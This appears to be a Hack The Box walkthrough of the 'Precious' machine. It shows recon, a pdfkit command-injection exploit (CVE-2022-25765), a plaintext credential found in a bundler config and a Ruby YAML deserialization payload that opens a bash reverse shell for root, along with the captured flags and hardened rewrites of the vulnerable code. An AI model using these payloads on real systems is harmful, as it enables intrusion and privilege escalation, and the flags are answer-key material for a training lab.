Precious
Precious Linux · Easy - Adventure mode
🔭 Reconnaissance:
┌──(pmartinezr㉿kali)-[~]
└─$ nmap -p- -Pn -sSVC --min-rate 5000 10.129.228.98
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-05 22:21 CET
Nmap scan report for 10.129.228.98
Host is up (0.045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
| 256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_ 256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.15 seconds
On the website there is a form where we enter a URL and the site converts the content of that page into a PDF.
🔭 Reconnaissance:
┌──(pmartinezr㉿kali)-[~]
└─$ /usr/bin/whatweb http://precious.htb/
http://precious.htb/ [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.18.0 + Phusion Passenger(R) 6.0.15], IP[10.129.228.98], Ruby-on-Rails, Title[Convert Web Page to PDF], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-Powered-By[Phusion Passenger(R) 6.0.15], X-XSS-Protection[1; mode=block], nginx[1.18.0]
Using whatweb we can see that the site is built with Ruby on Rails, which gives us a hint about where to look.
CVE: CVE-2022-25765
💣 Preparation:
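CVE-2022-25765 is a command injection in the pdfkit gem before 0.8.7.2: the URL the user submits ends up on the wkhtmltopdf command line, so shell metacharacters in it are executed. The fix is upgrading the gem; on top of that, a converter endpoint should only accept URLs it has positively validated. The following allow-list check is an added example written for this page, not the application's own code; the `validate_pdf_source` name and the 2048-byte limit are my choices, and it goes slightly beyond the page by also refusing literal loopback, private and link-local addresses so the converter cannot be pointed at internal services.

```ruby
require "uri"
require "ipaddr"

# Plain DNS hostname labels only (no percent-encoding, no stray bytes).
HOSTNAME_RE = /\A[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*\z/i
# Characters a shell would interpret; a well-formed http(s) URL never needs them unencoded.
SHELL_META_RE = /[\s`$;|<>(){}'"\\]/

# Returns the URL as a normalised string when it is safe to hand to the converter,
# or nil when the request must be rejected.
def validate_pdf_source(raw)
  return nil unless raw.is_a?(String) && raw.length <= 2048   # assumed size limit
  return nil if raw.match?(SHELL_META_RE)

  uri = URI.parse(raw)
  return nil unless uri.is_a?(URI::HTTP)   # URI::HTTPS < URI::HTTP; drops file:, ftp:, javascript: ...
  return nil if uri.userinfo               # no user:password@host forms
  host = uri.hostname                      # strips the [] around IPv6 literals
  return nil if host.nil? || host.empty?

  begin
    ip = IPAddr.new(host)
    # Literal IP: refuse loopback/private/link-local destinations (SSRF defence in depth).
    # Names that resolve to such addresses are not handled here.
    return nil if ip.loopback? || ip.private? || ip.link_local?
  rescue IPAddr::InvalidAddressError
    return nil unless host.match?(HOSTNAME_RE)   # not an IP, so it must be a clean hostname
  end

  uri.to_s
rescue URI::InvalidURIError
  nil
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs: one legitimate URL and three that must be refused.
  ["http://precious.htb/", "http://%20`id`", "file:///etc/passwd", "http://127.0.0.1/"].each do |u|
    puts "#{u.inspect} -> #{validate_pdf_source(u).inspect}"
  end
end
```

The metacharacter check runs before `URI.parse` on purpose: the parser already rejects most of those bytes, but the explicit regex documents the intent and does not depend on which URI parser a given Ruby version ships. Legitimate query strings (`?a=1&b=2`) still pass, since `&` and `=` are not in the list.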
https://github.com/lowercasenumbers/CVE-2022-25765
┌──(pmartinezr㉿kali)-[~/htb/precious]
└─$ python cve-2022-25765.py -t http://precious.htb -l 10.10.14.110 -p 4444
/home/pmartinezr/htb/precious/cve-2022-25765.py:19: SyntaxWarning: invalid escape sequence '\ '
# / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ \| ___|___ / /_| ___| _ __ _ _ #
################################################################################################
# ______ _______ ____ ___ ____ ____ ____ ____ _____ __ ____ #
# / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ \| ___|___ / /_| ___| _ __ _ _ #
# | | \ \ / /| _| _____ __) | | | |__) | __) |____ __) |___ \ / / '_ \___ \ | '_ \| | | | #
# | |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____/ __/ ___) |/ /| (_) |__) || |_) | |_| | #
# \____| \_/ |_____| |_____|\___/_____|_____| |_____|____//_/ \___/____(_) .__/ \__, | #
# |_| |___/ #
# #
# Exploit Title: pdfkit < 0.8.7.2 - Command Injection #
# Exploit Author: lowercasenumbers #
# Vendor Homepage: https://pdfkit.org/ #
# Software Link: https://github.com/pdfkit/pdfkit #
# Version: < 0.8.7.2 #
# Tested on: pdfkit 0.8.6 #
# CVE: CVE-2022–25765 #
# #
################################################################################################
> Sending Reverse Shell
> Exploit Completed
> Check your netcat listener
👽 Actions:
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.110:4444
[*] Command shell session 1 opened (10.10.14.110:4444 -> 10.129.228.98:53972) at 2026-01-06 00:54:30 +0100
shell
[*] Trying to find binary 'python' on the target machine
[-] python not found
[*] Trying to find binary 'python3' on the target machine
[*] Found python3 at /usr/bin/python3
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /usr/bin/bash
ruby@precious:/var/www/pdfapp$ whoami
whoami
ruby
ruby@precious:~/.bundle$ cat config
cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"
Apparently someone left a file containing a user's password in .bundle/config: henry:Q3c1AqGHtoI0aXAYFH
┌──(pmartinezr㉿kali)-[~/htb/precious]
└─$ ssh henry@precious.htb
The authenticity of host 'precious.htb (10.129.228.98)' can't be established.
ED25519 key fingerprint is: SHA256:1WpIxI8qwKmYSRdGtCjweUByFzcn0MSpKgv+AwWRLkU
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'precious.htb' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
henry@precious.htb's password:
Linux precious 5.10.0-19-amd64 #1 SMP Debian 5.10.149-2 (2022-10-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User henry may run the following commands on precious:
(root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
henry@precious:/opt$ cat /home/henry/user.txt
c8592f5a0251a7f4b6173b15a021d45c
🔭 Reconnaissance:
henry@precious:~$ cat /opt/dependencies.yml
ls /opt/sample -ltr
total 4
-rw-r--r-- 1 root root 26 Sep 22 2022 dependencies.yml
We cannot modify the dependencies.yml file or the /opt/update_dependencies.rb script.
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end
This is the original content of the update_dependencies.rb file.
💣 Preparation:
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: "bash -c 'bash -i >& /dev/tcp/10.10.14.110/4444 0>&1'"
method_id: :resolve
However, since the script loads dependencies.yml from the current working directory, I can recreate the yml file with a reverse shell and place it in /home/henry.
🪲 Exploitation:
https://github.com/v4resk/red-book/blob/main/redteam/privilege-escalation/linux/script-exploits/ruby.md Here is the explanation of the exploit.
👽 Actions:
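Two defects in update_dependencies.rb make the escalation work: `YAML.load` on Ruby 2.x (Psych 3) instantiates whatever `!ruby/object:` tags the document names, which is how the payload above chains rubygems and Net classes into `Kernel#system`; and the file is opened by a relative name, so whoever controls the working directory of the sudo invocation controls the input. Below is a hardened rewrite, added here as an example and not the box's or HTB's own code: it uses `YAML.safe_load` with no permitted classes, symbols or aliases, reads from an absolute path (`/opt/dependencies.yml`, assumed from the listing above), and returns comparison results instead of printing them. Psych 4 (Ruby 3.1+) already makes `YAML.load` behave like `safe_load`, but spelling it out keeps the script safe on any interpreter.

```ruby
require "yaml"
require "rubygems"

# Assumed absolute location of the pinned-versions file; the original script
# opened "dependencies.yml" relative to the caller's working directory.
DEPENDENCIES_PATH = "/opt/dependencies.yml"
NAME_RE = /\A[A-Za-z0-9_.\-]+\z/

class DependencyFileError < StandardError; end

# Parse the pinned versions with the restricted loader: no !ruby/object tags,
# no symbols, no aliases. Anything but a flat name => version mapping is refused.
def parse_dependencies(yaml_text)
  data = YAML.safe_load(yaml_text, permitted_classes: [], permitted_symbols: [], aliases: false)
  raise DependencyFileError, "expected a mapping of gem name to version" unless data.is_a?(Hash)

  data.each_with_object({}) do |(name, version), out|
    version = version.to_s if version.is_a?(Numeric)   # an unquoted 13.0 parses as a Float
    unless name.is_a?(String) && name.match?(NAME_RE) &&
           version.is_a?(String) && Gem::Version.correct?(version)
      raise DependencyFileError, "invalid entry: #{name.inspect} => #{version.inspect}"
    end
    out[name] = version
  end
rescue Psych::Exception => e
  # Psych::DisallowedClass (tagged objects), Psych::BadAlias and Psych::SyntaxError land here.
  raise DependencyFileError, "refusing to load dependency file: #{e.message}"
end

# Installed gems as name => [versions]; several versions of one gem may coexist.
def list_local_gems
  Gem::Specification.each_with_object({}) { |g, h| (h[g.name] ||= []) << g.version.to_s }
end

# Returns [[name, :match | :differs | :missing], ...] rather than printing, so it can be tested.
def compare_versions(gems_file, gems_local)
  gems_file.map do |name, wanted|
    installed = gems_local[name]
    status = if installed.nil? then :missing
             elsif installed.include?(wanted) then :match
             else :differs
             end
    [name, status]
  end
end

# Only runs when the pinned file actually exists on this machine.
if __FILE__ == $PROGRAM_NAME && File.readable?(DEPENDENCIES_PATH)
  deps = parse_dependencies(File.read(DEPENDENCIES_PATH))
  compare_versions(deps, list_local_gems).each { |name, status| puts "#{name}: #{status}" }
end
```

With this loader the payload from the Preparation section is rejected at its first `!ruby/object:` tag before any object is built, and because the path is absolute a `dependencies.yml` dropped into the caller's home directory is never consulted. The sudoers rule itself is unchanged; the point is that a root-run script must not trust input the invoking user can shape.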
henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found
We run the script with sudo.
┌──(pmartinezr㉿kali)-[~/htb/precious]
└─$ socat TCP-LISTEN:4444 -
root@precious:/home/henry# cat /root/root.txt
cat /root/root.txt
3e08fed0cf427dfcf93ba57cdabe1821